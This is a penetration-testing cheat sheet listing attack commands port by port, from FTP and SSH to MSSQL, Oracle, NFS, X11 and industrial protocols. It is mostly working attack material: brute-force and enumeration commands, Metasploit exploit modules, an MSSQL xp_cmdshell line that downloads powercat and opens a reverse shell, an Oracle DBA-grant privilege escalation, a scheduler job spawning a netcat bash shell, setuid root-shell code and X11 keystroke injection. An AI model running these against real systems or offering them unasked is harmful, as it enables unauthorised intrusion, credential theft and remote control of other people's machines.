Services

7 - Echo

nc -uvn <IP> 7
Hello echo    #This is what you send
Hello echo    #This is the response

21 - FTP

Fingerprint

telnet <IP> 21

use auxiliary/scanner/ftp/ftp_version

Anonymous access

ftp <IP>
> anonymous
> anonymous
> ls -ab
> binary
> ascii
> bye

nmap -sV --script ftp-anon -p <IP>

Brute Force

hydra -t 1 -l admin -P /root/Desktop/password.lst -vV <IP> ftp

nmap -sV --script ftp-brute -p <IP>

use auxiliary/scanner/ftp/ftp_login

FTP Bounce Port Scanner

nmap -sV --script ftp-bounce -p <IP>

use auxiliary/scanner/portscan/ftpbounce

Configuration files

• ftpusers

• ftp.conf

• proftpd.conf

22 - SSH

Fingerprint/Enumerate

telnet <IP> 22 (banner grab)

use auxiliary/scanner/ssh/ssh_version

nmap --script ssh2-enum-algos -p 22 -n <IP>
nmap --script ssh-hostkey -p 22 -n <IP> --script-args ssh_hostkey=full
nmap --script sshv1 -p 22 -n <IP>

Brute Force

hydra -l root -p admin <IP> -t 4 ssh

use auxiliary/scanner/ssh/ssh_login

Configuration files

• ssh_config

• sshd_config

• authorized_keys

• ssh_known_hosts

• .shosts

23 - Telnet

Fingerprint

telnet <IP>

nmap -p 23 <ip> --script telnet-encryption

use auxiliary/scanner/telnet/telnet_version

Brute Force

hydra -L usernames.txt -P passwords.txt <IP> telnet -V

nmap -p 23 --script telnet-brute --script-args userdb=<myusers.lst>,passdb=<mypwds.lst>,telnet-brute.timeout=8s <IP>

use auxiliary/scanner/telnet/telnet_login

# Solaris 10+
telnet -l "-froot" hostname

Configuration files

• /etc/inetd.conf

• /etc/xinetd.d/telnet

• /etc/xinetd.d/stelnet

25, 587 - SMTP

Fingerprint / SASL Methods

telnet <IP> 25
> ehlo me

openssl s_client -connect <IP>:25 -starttls smtp
> ehlo me

nmap --script smtp-commands.nse [--script-args smtp-commands.domain=<domain>] -pT:25,465,587 <IP>

use auxiliary/scanner/smtp/smtp_version

Enumerate users

VRFY username
EXPN username

nmap --script smtp-enum-users.nse [--script-args smtp-enum-users.methods={EXPN,...},...] -p 25,465,587 <IP>

use auxiliary/scanner/smtp/smtp_enum

Brute Force

nmap -p 25 --script smtp-brute <IP>

Open Mail Relay

HELO me
MAIL FROM: test@testdomain.com
RCPT TO: my_email@example.com
DATA 
Subject: This is a test mail 
From: Test User
To: Test Target
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
This is a test email for you to read.
.
QUIT

nmap -v --script=smtp-open-relay -p 25 <IP>

use auxiliary/scanner/smtp/smtp_relay

53 - DNS

DNS Enumeration

use auxiliary/gather/dns_srv_enum
use auxiliary/gather/enum_dns

nmap --script=dns-service-discovery -p 5353 <IP>
nmap --script=broadcast-dns-service-discovery <IP>
nmap --script dns-blacklist --script-args='dns-blacklist.ip=<ip>'
nmap -sSU -p 53 --script dns-nsid <IP>
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='example.com'"

Zones/Zone Transfer

nmap -sn -Pn ns1.example.com --script dns-check-zone --script-args='dns-check-zone.domain=example.com'
nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=<domain>

Recursion

nmap -sU -p 53 --script=dns-recursion <IP>

DNS Lookup

host <Domain>

nslookup <Domain>  [server]
nslookup -type=ns <Domain>

dig [-4 | -6 ] @<Server> <Domain> <Type>

fierce -dns <domain>

python 
>>> import socket
>>> socket.gethostbyname('www.google.com')

use auxiliary/gather/dns_info

Reverse DNS Lookup

dig [-4 | -6 ] -x <IP>

nslookup -type=ns <IP>

dnsrecon -r <startIP-endIP>

whois <IP> | grep -E "Creation|Created|Registration|created|Expiration|Expires|Email"

use auxiliary/gather/dns_reverse_lookup

Brute Force

nmap --script dns-brute www.example.com -sn -n -Pn

use auxiliary/gather/dns_bruteforce

DNS Amplification Scanner

auxiliary/scanner/dns/dns_amp

DNS Non-Recursive Record Scraper

nmap -sU -p 53 --script dns-cache-snoop.nse <IP>

use auxiliary/gather/dns_cache_scraper

Configuration Files

• host.conf

• resolv.conf

• named.conf

69 - TFTP

Enumeration

tftp <IP> PUT local_file
tftp <IP> GET conf.txt (or other files)

# Solarwinds TFTP server
tftp – i <IP> GET /etc/passwd (old Solaris)

Bruteforcing

use auxiliary/scanner/tftp/tftpbrute

79 - Finger

User enumeration

finger root example.com
finger 'a b c d e f g h' @example.com
finger admin@example.com
finger user@example.com
finger 0@example.com
finger .@example.com
finger **@example.com
finger test@example.com
finger @example.com

nmap -sV -sC <target>

use auxiliary/scanner/finger/finger_users

Command execution

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

finger user@host@victim
finger @internal@external

Funny Bit

Weather forecast

finger london@graph.no

80, 8080, 443 - Web Ports

Too much to be listed here: These are not the droids you are looking for.

• Web

88 - Kerberos

Enumerate Users

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='test'" <IP>

110 - POP3

Enumeration

nmap -sV -sC <IP>

use auxiliary/scanner/pop3/pop3_version

Brute Force

nmap -sV --script=pop3-brute <IP>

use auxiliary/scanner/pop3/pop3_login

Retrieve email

telnet <IP> 110
> USER admin@<IP>
> PASS admin

# List all emails
> list

# Retrive email number 5, for example
> retr 5

111 - Portmapper

Enumerate RPC-based services

rpcinfo <IP>
rpcinfo -p <IP>

nmap -sSUC -p111 <IP>

RPCBind + NFS

Check for the nfs mounts using port 111

rpcbind -p <IP>

use auxiliary/scanner/nfs/nfsmount

• (https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc)

113 - Ident

Enumeration

nmap -sV -sC <IP>

119 - NNTP Network News Transfer Protocol

Enumeration

nmap -p 119,433,563 --script nntp-ntlm-info <IP>

Brute Force

use auxiliary/scanner/nntp/nntp_login

123 - NTP

Enumeration

nmap -sU -p 123 --script ntp-info <IP>
nmap -sU -p 123 --script ntp-monlist.nse <IP>

ntpq <IP>
> lpeers
> version
> readlist
> host
> hostname
> ntpversion

ntpdc -c monlist <IP>
ntpdc -c sysinfo <IP>

Mode 6 Query

ntpq -c rv <IP>

Configuration files

• ntp.conf

135-139, 445 - NetBIOS

Enumeration

net view \\<IP>

use auxiliary/scanner/smb/smb_version

nbtscan -r 192.168.1.1/24

enum4linux -a <IP>

nmap --script=broadcast-netbios-master-browser <IP>

nmap --script=msrpc-enum <IP>

use exploit/windows/dcerpc/ms03_026_dcom

Domain

nmblookup -A <DC_IP>

SMB/Samba shares

smbclient -L 10.10.10.10
smbclient //10.10.10.10/tmp
smbclient \\\\10.10.10.10\\ipc$ -U bob
smbclient //10.10.10.10/ipc$ -U bob

Null Session

net use \\<IP>\ipc$ "" /u:""

smbclient //TYPHOON/typhoon -I <IP> -N

Connectin with PSExec

use exploit/windows/smb/psexec

Configuration Files

• Smb.conf

• lmhosts

135, 593 - Microsoft Windows RPC Services and Microsoft RPC Services over HTTP

Enumeration

Endpoint Mapper Service Discovery
    use auxiliary/scanner/dcerpc/endpoint_mapper
Hidden DCERPC Service Discovery
    use auxiliary/scanner/dcerpc/hidden
Remote Management Interface Discovery
    use auxiliary/scanner/dcerpc/management
DCERPC TCP Service Auditor
    use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor

rpcdump.py <IP>

161 - SNMP

Enumeration

nmap  -Pn -sU -p 161 --script=snmp-brute <IP>
nmap  -Pn -sU -p 161 --script=snmp-interfaces <IP>

Available nse scripts:

    snmp-brute.nse
    snmp-hh3c-logins.nse
    snmp-info.nse
    snmp-interfaces.nse
    snmp-ios-config.nse
    snmp-netstat.nse
    snmp-processes.nse
    snmp-sysdescr.nse
    snmp-win32-services.nse
    snmp-win32-shares.nse
    snmp-win32-software.nse
    snmp-win32-users.nse

snmpwalk -v <Version> -c <Community string> <IP>

Default Community Strings

        public
        private
        community

use auxiliary/scanner/snmp/snmp_enum

Bruteforce

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <IP>

for i in $(cat /usr/share/doc/onesixtyone/dict.txt); do echo -n "$i :"; snmpget -v 3 -u $i udp6:[<IPv6>] 1.3.6.1.2.1.1.4.0;  done

use auxiliary/scanner/snmp/snmp_login

Configuration files

• snmp.conf

• snmpd.conf

• snmp-config.xml

264 - Check Point FireWall-1 Topology

Enumeration

use auxiliary/gather/checkpoint_hostname

389, 636 - LDAP

Enumeration

nmap -p 389 --script ldap-rootdse <IP>

ldapsearch -LLL -x -H ldap://<domain fqdn> -b ‘’ -s base ‘(objectclass=*)’
ldapsearch -h <IP> -p 389 -x -s base -b '' "(objectClass=*)" "*" +
ldapsearch -h <IP> -p 389 -x -b "dc=example,dc=com"

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=users,ldap.attrib=sAMAccountName' <IP>

Brute force

nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' <ip>

Configuration Files

• General

  • containers.ldif

  • ldap.cfg

  • ldap.conf

  • ldap.xml

  • ldap-config.xml

  • ldap-realm.xml

  • slapd.conf

• IBM SecureWay V3 server

  • V3.sas.oc

• Microsoft Active Directory server

  • msadClassesAttrs.ldif

• Netscape Directory Server 4

  • nsslapd.sas_at.conf

  • nsslapd.sas_oc.conf

• OpenLDAP directory server

  • slapd.sas_at.conf

  • slapd.sas_oc.conf

• Sun ONE Directory Server 5.1

  • 75sas.ldif

500/1723 - PPTP/L2TP/VPN

Aggressive mode

ike-scan <IP> -M -A --id=123

Testing process would go as follows:

• Scan for the IKE service

• Enumerate transform sets and confirm Aggressive Mode support

• Run IKEForce in enum mode to obtain a valid group name or ID

• Obtain a valid hash using IKE-Scan

• Crack the hash using OCLHashcat

• Run IKEForce in brute mode to obtain valid XAUTH credentials

• Authenticate using chosen client

• Pwn to your heart's content

enumerate id

Test 1

ike-scan

python ikeforce.py <IP> -a

python ikeforce.py <IP> -e -t x x x x -w ./wordlists

Test 2

ike-scan -M <IP>

ike-scan -M <IP> -A

ike-scan -M <IP> -A --auth=65001

for i in $(cat /root/groups.txt); do echo |tee -a /root/vpn-test; echo "Testing: $i" |tee -a /root/vpn-test && ike-scan -M <IP> -A --auth=65001 --id=$i | tee -a /root/vpn_test; done

grep "Handshake returned" -B2 /root/vpn_test

ike-scan -M <IP> -A --auth=65001 --id=ID -P/tmp/psk

psk-crack -d /usr/share/wordlists/metasploit/unix_passwords.txt /tmp/psk

502 - Modbus

Discover

nmap --script modbus-discover.nse --script-args='modbus-discover.aggressive=true' -p 502 <IP>

512 - rexec

Access

rlogin <ipaddress>

Brute Force

nmap -p 512 --script rexec-brute <IP>

use auxiliary/scanner/rservices/rexec_login

513 - rlogin

Enumeration

Find the files
    find / -name .rhosts
    locate .rhosts
Examine Files
    cat .rhosts
Subvert the files
    echo ++ > .rhosts

Manual Login

rlogin -l username <IP>
rlogin <IP>

Brute force

nmap -p 513 --script rlogin-brute <ip>

hydra -L usernames.txt -P passwords.txt <IP> rlogin -V

use auxiliary/scanner/rservices/rlogin_login

514 - rsh

Enumeration

rsh <IP> <Command>

Brute force

hydra -L usernames.txt rsh://<IP> -v -V

use auxiliary/scanner/rservices/rsh_login

548 - AFP - Apple Filing Protocol

Enumeration

nmap -sV -sC <IP>
nmap -sS -sV -p 548 --script=afp-ls <IP>
nmap -sV --script=afp-showmount <IP>
nmap -sV --script=afp-path-vuln <IP>

use auxiliary/scanner/afp/afp_server_info

Brute force

nmap -p 548 --script afp-brute <IP>

554, 8554 - RTSP

Enumeration

nmap -p 8554 -sV --script rtsp-methods <IP> 
nmap -p 554 --script rtsp-methods <ip>

Brute Force

nmap -p 554 --script rtsp-url-brute  <ip>

873 - Rsync

Enumeration

nmap -p 873 --script=rsync-list-modules <IP>

use auxiliary/scanner/rsync/modules_list

1099 - Java RMI

Enumeration

use auxiliary/scanner/misc/java_rmi_server

Notable Exploits

Java RMI Server Insecure Default Configuration Java Code Execution

use exploit/multi/misc/java_rmi_server

Default configuration of rmiregistry allows loading classes from remote URLs

nmap --script=rmi-vuln-classloader -p 1099 <IP>

1433, 1434 - SQL Server

Metasploit

Queries the MSSQL instance for information

use auxiliary/scanner/mssql/mssql_ping

Default passwords

use auxiliary/scanner/mssql/mssql_login

Microsoft SQL Server Configuration Enumerator

use auxiliary/admin/mssql/mssql_enum

Microsoft SQL Server xp_cmdshell Command Execution

use auxiliary/admin/mssql/mssql_exec

EXEC xp_cmdshell 'powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://10.0.0.1:8080/powercat.ps1");powercat -c 10.0.0.1 -p 443 -e cmd'

Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration

use auxiliary/admin/mssql/mssql_enum_domain_accounts

Microsoft SQL Server Find and Sample Data

use auxiliary/admin/mssql/mssql_findandsampledata

Microsoft SQL Server Generic Query

use auxiliary/admin/mssql/mssql_sql

MSSQL Schema Dump

use auxiliary/scanner/mssql/mssql_schemadump

Others

use auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli
use auxiliary/admin/mssql/mssql_enum_sql_logins
use auxiliary/admin/mssql/mssql_escalate_dbowner
use auxiliary/admin/mssql/mssql_escalate_dbowner_sqli
use auxiliary/admin/mssql/mssql_escalate_execute_as
use auxiliary/admin/mssql/mssql_escalate_execute_as_sqli
use auxiliary/admin/mssql/mssql_idf
use auxiliary/admin/mssql/mssql_ntlm_stealer
use auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
use auxiliary/admin/mssql/mssql_sql_file
use auxiliary/analyze/jtr_mssql_fast
use auxiliary/scanner/mssql/mssql_hashdump

Hacking SQL Server Stored Procedures

• https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/

• https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/

• https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/

• https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

1494 - Citrix

Enumeration

1521 - Oracle

Oracle Enumeration

use auxiliary/scanner/oracle/tnslsnr_version
use auxiliary/scanner/oracle/sid_enum

Brute Force

nmap

nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560 <IP>
nmap --script=oracle-sid-brute -p 1521-1560 <IP>
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL <IP>
nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL <IP>
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 <IP>

odat

./odat-libc2.5-x86_64 sidguesser -s <IP>>

./odat-libc2.5-x86_64 passwordguesser -d XE -s <IP>

metasploit

use auxiliary/scanner/oracle/oracle_login
use auxiliary/scanner/oracle/sid_brute

PrivEsc

select * from session_privs;

select banner from v$version where banner like 'Oracle%';

Create function:

CREATE OR REPLACE FUNCTION GETDBA_mine(FOO varchar) return varchar deterministic authid current_user is pragma autonomous_transaction;
begin
execute immediate 'grant dba to myuser identified by myuser';
commit;
return 'FOO';
End;

Create index:

create index exploit_index_mine on SYS.DUAL(SCOTT.GETDBA_mine('BAR'));

select user from sys.dual;

LOGIN WITH NEW USER - VIA RAZORSQL

select * from session_privs;

Start listener on Kali:

nc -lnvp 9999

Create job:

begin
dbms_scheduler.create_job( job_name => 'TEST',job_type =>
'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('TESTX', 1, 'KALI_IP');
dbms_scheduler.set_job_argument_value('TESTX', 2, '9999');
dbms_scheduler.set_job_argument_value('TESTX', 3, '-e');
dbms_scheduler.set_job_argument_value('TESTX', 4, '/bin/bash');
dbms_scheduler.enable('TESTX');
end;

SQL Injection References

• [http://pentestmonkey.net/category/cheat-sheet/sql-injection]

• [https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/]

• [https://securiteam.com/securityreviews/5DP0N1P76E}

2049 - NFS

Enumeration

showmount -e <hostname/IP>

mount -t nfs <IP>:/directory_found_exported /local_directory

no_root_squash

Case 1:

int main(void) {
setgid(0); setuid(0);
execl(“/bin/sh”,”sh”,0); }

chown root.root ./pwnme
chmod u+s ./pwnme

Case 2:

cp /bin/bash local_shell

cat local_shell > spawn_root_shell
chmod 4777 !$

./spawn_root_shell -p

Configuration Files

• /etc/exports

• /etc/lib/nfs/xtab

2301, 2381 - Compaq/HP Insight Manager

Enumeration

nmap -sV -p 2301,2381 <IP>

Configuration Files

• path.properties

• mx.log

• CLIClientConfig.cfg

• database.props

• pg_hba.conf

• jboss-service.xml

• .namazurc

3260 - ISCSI

Enumeration

nmap -sV -p 3260 --script=iscsi-info <IP>

Exploitation

• https://www.pentestpartners.com/security-blog/an-interesting-route-to-domain-admin-iscsi/

3306 - MySQL

Enumeration

nmap -A -n -p3306 <IP>
nmap -A -n -PN --script:ALL -p3306 <IP>

telnet <IP> 3306

use test; select * from test;

use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_hashdump

mysql -u root -p -h <IP>

Quick testing

mysql -h <IP> -u root
mysql -h <IP> -u root
mysql -h <IP> -u root@localhost
mysql -h <IP>
mysql -h <IP> -u ""@localhost

Brute Force

use auxiliary/scanner/mysql/mysql_login

Privilege Escalation

Current Level of access
    mysql> select user();
    mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
Access passwords
    mysql> use mysql
    mysql> select user,password from user;
Create a new user and grant him privileges
    mysql>create user test identified by 'test';
    mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
Break into a shell
    mysql> \! cat /etc/passwd
    mysql> \! bash

Configuration Files

• windows

  • config.ini

    • my.ini

  • windows\my.ini

  • winnt\my.ini

    • /mysql/data/

• unix

  • my.cnf

    • /etc/my.cnf

    • /etc/mysql/my.cnf

    • /var/lib/mysql/my.cnf

    • ~/.my.cnf

    • /etc/my.cnf

• Command History

  • ~/.mysql.history

• Log Files

  • connections.log

  • update.log

  • common.log

3389 - RDesktop

Network level auth NLA

nmap -p 3389 --script rdp-enum-encryption <IP>

Brute Force

ncrack -vv --user Administrator -P /root/passwords.txt rdp://192.168.1.101

5000+ - Sybase

Enumeration

5060 - SIP

Enumeration

nc <IP> 5060

Configuration Files

• SIPDefault.cnf

• asterisk.conf

• sip.conf

• phone.conf

• sip_notify.conf

• .cfg

• 000000000000.cfg

• phone1.cfg

• sip.cfg etc. etc.

5432 - Postgresql

Enumeration

use auxiliary/scanner/postgres/postgres_version

Brute Force

use auxiliary/scanner/postgres/postgres_login

Exploitation

PostgreSQL 9.0, 9.1, and 9.2

use auxiliary/scanner/postgres/postgres_dbname_flag_injection

• https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9

5555 - HPDataProtector

RCE

use exploit/multi/misc/hp_data_protector_exec_integutil

5900^ - VNC

Enumeration

use auxiliary/scanner/vnc/vnc_none_auth

Scan 5900^ for direct access.5800 for HTTP access.

Brute Force

use auxiliary/scanner/vnc/vnc_login

Password Attacks

Registry Locations
    \HKEY_CURRENT_USER\Software\ORL\WinVNC3
    \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
Decryption Key
    0x238210763578887

Default location where the VNC password is stored

~/.vnc/passwd

Configuration Files

• .vnc

• /etc/vnc/config

• $HOME/.vnc/config

• /etc/sysconfig/vncservers

• /etc/vnc.conf

5984 - CouchDB

Enumeration

curl http://<IP>:5984/
curl -X GET http://<IP>:5984/_all_dbs
curl -X GET http://user:password@<IP>:5984/_all_dbs
curl -X GET http://<IP>:5984/{dbname}/_all_docs
curl -X GET http://<IP>:5984/{dbname}/{id}

6000^ - X11

Enumeration

nmap -p 6000 --script=x11-access <IP>> -nvvv

use auxiliary/scanner/x11/open_x11

Screenshots

xwd -display <IP>:0 -root -out screenshot.xwd

If image is black, kill screensaver:

xwininfo -root -children -display <IP>>:0

xkill -display 192.168.X.209:0 -id 0x3200001 # 0x3200001 = "gnome-screensaver"

Keyboard Command Injection

Manual

export DISPLAY=<IP>:0

xdotool type "id"

xdotool key KP_Enter

xdotool type "clear && history () bash && history"

xdotool key KP_Enter

Metasploit

use exploit/unix/x11/x11_keyboard_exec

Sniff the keyboard keystrokes

xspy <IP>

Configuration Files

• /etc/Xn.hosts

• /usr/lib/X11/xdm

• Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"

• /usr/lib/X11/xdm/xsession

• /usr/lib/X11/xdm/xsession-remote

• /usr/lib/X11/xdm/xsession.0

• /usr/lib/X11/xdm/xdm-config

• DisplayManager*authorize:on

6379 - Redis

Enumeration

nmap -p 6379 --script redis-info <IP>

use auxiliary/scanner/redis/redis_server
use auxiliary/scanner/redis/redis_login
use auxiliary/scanner/redis/file_upload

Exploitation

• https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html

9001, 9030 - Tor

Enumeration

nmap --script=tor-consensus-checker <IP>

9100 - PJL - Jet Direct

Enumeration

nmap -p 9100 --script=pjl-ready-message.nse -n  <IP>

use auxiliary/scanner/printer/printer_version_info

9160 - Apache Cassandra

Enumeration

nmap -p 9160 -n --script=cassandra-info <IP>

Brute Force

nmap -p 9160 -n --script=cassandra-brute <IP>

10000 - NDMP -Network Data Management Protocol

Enumeration

nmap -sV <IP>
nmap -p 10000 --script ndmp-fs-info -n <IP>

11211 - Memcache

Enumeration

nmap -p 11211 --script memcached-info <IP>

telnet <IP> 11211

27017, 27018 - MongoDB

Enumeration

nmap -p 27017 -sV --script mongodb-info <IP>
nmap -p 27017 -sV --script mongodb-databases.nse <IP>

Brute Force

nmap 10.169.xx.xx -p 27017 -sV --script mongodb-brute -n

use auxiliary/scanner/mongodb/mongodb_login

44818 - EthernetIP-TCP-UDP

Enumeration

nmap -p 44818 -n --script enip-enumerate -Pn <IP>

47808 - UDP BACNet

Enumeration

nmap -sU -p 47808 -n -vvv --script BACnet-discover-enumerate --script-args full=yes <IP>